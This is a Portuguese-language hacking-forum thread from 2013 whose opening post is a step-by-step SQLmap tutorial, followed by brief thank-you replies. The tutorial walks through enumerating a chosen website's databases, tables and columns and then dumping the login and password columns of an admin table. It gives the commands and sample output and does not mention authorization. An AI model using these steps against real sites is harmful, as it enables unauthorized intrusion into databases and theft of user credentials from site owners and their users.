tutorial de sq lmap
TRANSCRIPT
Search...
OLÁ ROBMENDES Unread Replies
Fórum The Anony Bay » T.A.B SECURITY »
- Bugs & Exploits »
Tutorial de SQLmap
RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1]
Tutorial de SQLmap
« Online: 19-04-2013, 03:23:58 »CitarXiranha!
S.Administrador
Membro Participativo
Mensagens: 123
144 credits
View Inventory
Send Money To Xiranha!
Agradecimentos 202
"O medo só existe na mente dos
Curtir Seja o primeiro de seus amigos a curtir isso.
Oque é SQLmap ?
Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de
vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de
oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o
sistema de banco de dados se for possivel.
Para ver os comandos, basta digitar
Código: [Selecionar]
python sqlmap.py -h
Estudo
Após você ter o site que deseja explorar, digite
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs
--dbs é para descobrir a(s) database(s) que contem no site
O resultado será mais ou menos assim:
Código: [Selecionar]
[ * ] database_do_site<br />[ * ] information_schema
Após descobrir a(s) data base(s), digite
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables
« tópico anterior tópico seguinte »
Autor Tópico: Tutorial de SQLmap (Lida 108 vezes)
Início AjudaAjuda BuscaBusca Editar PerfilEditar Perfil Minhas MensagensMinhas Mensagens Today's PostsToday's Posts ShopShop MembrosMembros SairSair
TweetTweet 0 0
Fracos"
--tables é para descobrir as tabelas que tem dentro da database
O resultado será mais ou menos assim:
Código: [Selecionar]
+---------------+<br />| admin |<br />| publicidade |<br />| teste |<br />+---------------+
Após descobrir as tabelas, digite :
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns
--columns é para descobrir as colunas que tem dentro da tabela escolhida
O resultado será mais ou menos assim :
Código: [Selecionar]
+--------+--------------+<br />| Column | Type |<br />+--------+--------------+<br />| ID | int(11) |<br />| login | varchar(255) |<br />| senha | varchar(255) |<br />+--------+--------------+
Após descobrir as colunas, digite :
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,senha' --dump
--dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você
tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna
De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da
pasta
/pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv
Reportar ao moderador Registrado
"não Clique"
Re:Tutorial de SQLmap
« Resposta #1 Online: 19-04-2013, 06:30:43 »CitarPseudônimo
Administrador
Membro ExpertCurtir Seja o primeiro de seus amigos a curtir isso.
Eita Rafa, obrigado pelo ótimo tutorial. Parabéns.
TweetTweet 0 0
Mensagens: 293
202 credits
View Inventory
Send Money To Pseudônimo
Agradecimentos 46
Reportar ao moderador Registrado
Re:Tutorial de SQLmap
« Resposta #2 Online: 28-04-2013, 14:30:36 »Citarpnp
Novato
Mensagens: 11
90 credits
View Inventory
Send Money To pnp
Agradecimentos 0
Curtir Seja o primeiro de seus amigos a curtir isso.
ótimo Tutorial.
Reportar ao moderador Registrado
Re:Tutorial de SQLmap
« Resposta #3 Online: 25-06-2013, 00:10:53 »CitarWhisper
Membro Participativo
Mensagens: 66
Curtir Seja o primeiro de seus amigos a curtir isso.
muito bom mesmo..
vlw..
Reportar ao moderador Registrado
TweetTweet 0 0
TweetTweet 0 0
428 credits
View Inventory
Send Money To Whisper
Agradecimentos 2
Re:Tutorial de SQLmap
« Resposta #4 Online: 25-06-2013, 09:42:40 »CitarTh3Jok3rG4m3r
Na terra dos assassinos a mente
de um pecador é santuário.
Moderador Expert
Membro Expert
Mensagens: 340
2752 credits
View Inventory
Send Money To Th3Jok3rG4m3r
Agradecimentos 65
É, Eu sou um tanto quanto
ESTRANHO! Shhh Vá Dormir
Curtir Seja o primeiro de seus amigos a curtir isso.
Bem interessante Rafa, parabéns pelo tutorial
Reportar ao moderador Registrado
"Se RAP fosse coisa de bandido,muitos dos políticos seriam os MC's.
¯\_(ツ)_/¯ "
RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1]
Fórum The Anony Bay » T.A.B SECURITY »
- Bugs & Exploits »
Tutorial de SQLmap
Resposta Rápida
« tópico anterior tópico seguinte »
Ir para: => - Bugs & Exploits OK
TweetTweet 0 0
SMF 2.0.4 | SMF © 2013, Simple Machines
SMFAds for Free Forums
Fórum The Anony Bay by Host By : TheHostBay